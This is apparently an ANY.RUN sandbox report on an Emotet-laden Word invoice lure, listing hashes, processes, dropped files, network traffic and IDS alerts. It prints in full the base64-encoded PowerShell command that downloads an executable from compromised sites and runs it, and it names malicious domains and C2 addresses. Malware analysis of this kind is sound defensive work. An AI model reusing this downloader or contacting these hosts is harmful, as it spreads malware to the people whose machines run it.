analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

201901rechnung_9424808850.doc

Full analysis: https://app.any.run/tasks/5f64ec58-6007-4536-bf75-2e69422387ce
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 11, 2019, 11:34:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

EA2863ECFEE79533790C25EB84D66BEF

SHA1:

618564851234E471FDC08C34A082A3C966D00FA6

SHA256:

3BCCA13DE9F113A22475035E2DB4552D5DC991F3BFFDC88449711C0E0DA2617D

SSDEEP:

6144:bp2ppO0A4z+ihMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwvVAJTVa:bkzpcih8SVIf51E4K14o8Iue

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3488)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3488)
    • Request from PowerShell which ran from Office

      • POwershell.exe (PID: 2420)
    • Application was dropped or rewritten from another process

      • 293.exe (PID: 2872)
      • 293.exe (PID: 1488)
      • wabmetagen.exe (PID: 2936)
      • wabmetagen.exe (PID: 3564)
    • Downloads executable files from the Internet

      • POwershell.exe (PID: 2420)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2936)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3564)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3564)
  • SUSPICIOUS

    • Creates files in the user directory

      • POwershell.exe (PID: 2420)
    • Executable content was dropped or overwritten

      • POwershell.exe (PID: 2420)
      • 293.exe (PID: 1488)
    • Starts itself from another location

      • 293.exe (PID: 1488)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3488)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3488)
    • Dropped object may contain Bitcoin addresses

      • POwershell.exe (PID: 2420)
      • WINWORD.EXE (PID: 3488)
      • 293.exe (PID: 1488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://QAU28z.oXhqLV.SKISBk9u
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 366950 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://QAU28z.oXhqLV.SKISBk9u
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00856E4F
WordDocumentBodySectPRsidRDefault: 000370E0
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 000370E0
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 75928 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: YWoY9D1
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:11 07:32:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:11 07:32:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 293.exe no specs 293.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3488"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\201901rechnung_9424808850.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2420POwershell -e JAB0AGkATgA3AFEAagAwAD0AKAAnAHEAWQAzACcAKwAnAEcAJwArACcAaQBHAGoAUgAnACkAOwAkAEkAVABJADcAQwBBAFgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVgBYADQAUABOAGEAPQAoACcAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBwAHMAaQBfAHQAZQBzAHQALgBmACcAKwAnAGEAcgAnACsAJwBzAGUAYQAnACsAJwBzACcAKwAnAHQAeQAuAGMAbwBtAC8AOQAnACsAJwBTAFMANwBqACcAKwAnADUAJwArACcAMQAnACsAJwBxACcAKwAnAEAAaAAnACsAJwB0ACcAKwAnAHQAcAA6AC8AJwArACcALwAnACsAJwBqAHUAcwAnACsAJwB0AGMAbAAnACsAJwBpAGMAawBtACcAKwAnAGUAZABpAGEALgBjAG8AbQAvAFEAbwBYAEYAYQBoADUAQABoAHQAdAAnACsAJwBwADoALwAvAGcAbABvAHIAJwArACcAaQBhAGwAbwByAGkAbgBnAC4AJwArACcAYwBvAG0AJwArACcALwAwACcAKwAnAFkANwAnACsAJwB3ACcAKwAnADcAdAB4AEQARQBWAEAAaAAnACsAJwB0AHQAcAA6ACcAKwAnAC8ALwBhAHAAbwB0ACcAKwAnAGgAZQBlACcAKwAnAGsALQB2AG8AbABsAGUAbgAnACsAJwBoACcAKwAnAG8AJwArACcAdgBlAC4AbgBsAC8AJwArACcAQQAnACsAJwBzADkAJwArACcAeQA0AEoAUgBAACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AcwB5AG0AYgBpAHMAeQBzAHQAZQBtAHMALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvAEMASgB0AGYAawAwADEAeABGACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAGIAMwA2AGIAagA4AGsASwA9ACgAJwBNAHYAaQAnACsAJwBuAGQAZgBYACcAKQA7ACQAdwBWAFUAWgBzADIATgAgAD0AIAAoACcAMgA5ACcAKwAnADMAJwApADsAJAByADMASQBCADkAUgBrADIAPQAoACcAdQAnACsAJwBhADcAYgBRAHAAJwApADsAJABaAEYASQBaADIAaQA5AHoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcAVgBVAFoAcwAyAE4AKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABKADcANwBuAHYAYgBCACAAaQBuACAAJABWAFgANABQAE4AYQApAHsAdAByAHkAewAkAEkAVABJADcAQwBBAFgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASgA3ADcAbgB2AGIAQgAsACAAJABaAEYASQBaADIAaQA5AHoAKQA7ACQAagA5AHAAWQBJAHcAPQAoACcAcgBPAG4ARAB0ACcAKwAnAE8AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAWgBGAEkAWgAyAGkAOQB6ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAWgBGAEkAWgAyAGkAOQB6ADsAJAB6AHAAdAA1AGQAUAA9ACgAJwBVAG4AbgB3ACcAKwAnAHoASAAnACsAJwBXAHoAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGYATABNAGEAdABVAD0AKAAnAFgAVgBPAHQAJwArACcAaQAnACsAJwBwAFMANAAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\POwershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2872"C:\Users\admin\293.exe" C:\Users\admin\293.exePOwershell.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
United Kingdom Extended Keybo
Exit code:
0
Version:
6.1.7600.16385
1488"C:\Users\admin\293.exe"C:\Users\admin\293.exe
293.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
United Kingdom Extended Keybo
Exit code:
0
Version:
6.1.7600.16385
2936"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
293.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
United Kingdom Extended Keybo
Exit code:
0
Version:
6.1.7600.16385
3564"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporatio
Integrity Level:
MEDIUM
Description:
United Kingdom Extended Keybo
Version:
6.1.7600.16385
2716"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 343
Read events
1 853
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR896A.tmp.cvr
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE130508.SKISBk9u
MD5:
SHA256:
2420POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D4Q3KAAQNM3KCQ2FC4XX.temp
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~WRD0000.tmp
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A862A36-C383-4CFC-B96C-93B6A08BBABA}.tmp
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9B5C50B-96A0-41DB-8BB7-089D393CEB15}.tmp
MD5:
SHA256:
3488WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4E38AADE-24CC-47C2-92E6-9BD0234D259B}.tmp
MD5:
SHA256:
2420POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1994c4.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3488WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4CFDE06F6B09464EBF7C1ED64D403D86
SHA256:F400F67E70FDA63A223F50A2389C304E61923517ABD31DE5FF7C89C651D2905A
2420POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2420
POwershell.exe
GET
74.124.200.188:80
http://justclickmedia.com/QoXFah5
US
malicious
3564
wabmetagen.exe
GET
174.84.250.37:443
http://174.84.250.37:443/
US
malicious
2420
POwershell.exe
GET
200
104.152.110.73:80
http://glorialoring.com/0Y7w7txDEV/
US
executable
455 Kb
suspicious
2420
POwershell.exe
GET
301
104.152.110.73:80
http://glorialoring.com/0Y7w7txDEV
US
html
243 b
suspicious
2420
POwershell.exe
GET
301
103.96.72.146:80
http://psi_test.farseasty.com/9SS7j51q
HK
html
178 b
suspicious
2420
POwershell.exe
GET
403
103.96.72.146:80
http://psi_test.farseasty.com/9SS7j51q/
HK
html
162 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2420
POwershell.exe
104.152.110.73:80
glorialoring.com
InMotion Hosting, Inc.
US
suspicious
2420
POwershell.exe
103.96.72.146:80
psi_test.farseasty.com
Cloudie Limited
HK
malicious
2420
POwershell.exe
74.124.200.188:80
justclickmedia.com
InMotion Hosting, Inc.
US
malicious
3564
wabmetagen.exe
174.84.250.37:443
US
malicious
187.131.137.216:50000
Uninet S.A. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
psi_test.farseasty.com
  • 103.96.72.146
suspicious
justclickmedia.com
  • 74.124.200.188
malicious
glorialoring.com
  • 104.152.110.73
suspicious

Threats

PID
Process
Class
Message
2420
POwershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2420
POwershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2420
POwershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3564
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info